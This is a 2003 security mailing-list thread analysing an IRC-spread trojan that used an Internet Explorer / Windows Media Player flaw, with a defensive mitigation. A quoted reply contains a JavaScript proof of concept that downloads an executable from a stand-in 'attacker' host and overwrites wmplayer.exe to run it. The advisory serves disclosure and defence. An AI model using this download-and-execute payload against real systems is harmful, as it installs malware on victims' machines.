In-Reply-To: <20031027174719.11875.qmail@sf-www1-symnsj.securityfocus.com> This trojan is now identified : IRC.Trojan.Fgt [Symantec] IRC-Worm.Fagot [Kaspersky], Fagot [F-Secure] Type: Trojan Horse Infection Length: 156,672 bytes IRC.Trojan.Fgt is a downloaded file that disables firewall and security software,it works by sending messages via IRC chat, trying to get people to click on a web link, which would download "britney.jpg" from www.angelfire.com. It deletes critical system files and changes the Internet Explorer home page to a pornographic page. The website which was responsible for distributing this threat is no longer available. So the worm doesn't work any more (this version). More : http://securityresponse.symantec.com/avcenter/venc/data/irc.trojan.fgt.html Regards. K-OTik Staff /// http://www.k-otik.com >From: K-OTiK Security <Special-Alerts@k-otik.com> >To: bugtraq@securityfocus.com >Subject: Re: a dangerous fast spreading (yet simple) trojan horse. > >it uses a well known IE unpatched vulnerability discovered by jelmer on Sep 11 2003 "Windows Media Player & Internet Explorer File Download and Execution" : > >http://www.k-otik.com/WMPLAYER-TEST/ >http://www.securityfocus.com/archive/1/337285/2003-09-10/2003-09-16/2 >http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm > >To prevent this exploit : Disable Active Scripting > >Regards. >K-Otik Staff /// http://www.k-otik.com > >----------------------- POC ------------------------- > var x = new ActiveXObject("Microsoft.XMLHTTP"); > x.Open("GET", "http://attacker/trojan.exe",0); > x.Send(); > > var s = new ActiveXObject("ADODB.Stream"); > s.Mode = 3; > s.Type = 1; > s.Open(); > s.Write(x.responseBody); > > s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2); > location.href = "mms://"; >----------------------------------------------------- > >>From: "Gadi Evron" <ge@egotistical.reprehensible.net> >>Subject: a dangerous fast spreading (yet simple) trojan horse. >>Date: Mon, 27 Oct 2003 16:52:57 -0800 >> >>I usually do not email about "new" trojan horses unless they have >>something "special" about them, for there are a lot of them coming out >>non-stop. However, with this one, >>Although quite simple, is very destructive and spreading at incredible >>speed. >> >>The trojan horse spreads by people going to different URL's to download >>a *.jpg (started with britney.jpg). >> >>The jpeg is actually an HTML file, and when the web browser receives it, >>it thinks that it is a server error message for the file not existing, >>and loads the page. >> >>In the page we find a javascript line, that using hex encoding in an >>attempt to hide what it does, downloads patch.exe and replaces >>mplayer.exe with the new file. >>patch.exe connects to the mIRC DDE server, causing mIRC to spam, and >>then it start ruining the system's registry. Starting to delete keys at >>root and enumerating from there, one at a time. >>What I signify, and forgive my language, as an "Hump and dump" trojan >>horse. >> >>This reminds me of the first patch.exe trojan horse, that was purely a >>destructive file - back in 95/96. >> >>I would also like to commend angelfire for shutting down the first web >>page this appeared on very quickly. They always respond to abuse in a >>timely manner. The geocities page is still up last time I checked. >> >>Not very complicated, but interesting, and very dangerous. >> >> Gadi Evron (i.e. ge), >> ge@linuxbox.org. >> >>-------- >>gevron@netvision.net.il >>PGP Key: 2048/2048 (Size) 0x2D3D6741 (ID). >>Fingerprint: 0EB3 00BC 974B 3C2B 336D 6486 ECA5 2D0D 2D3D 6741. >> >> >> >
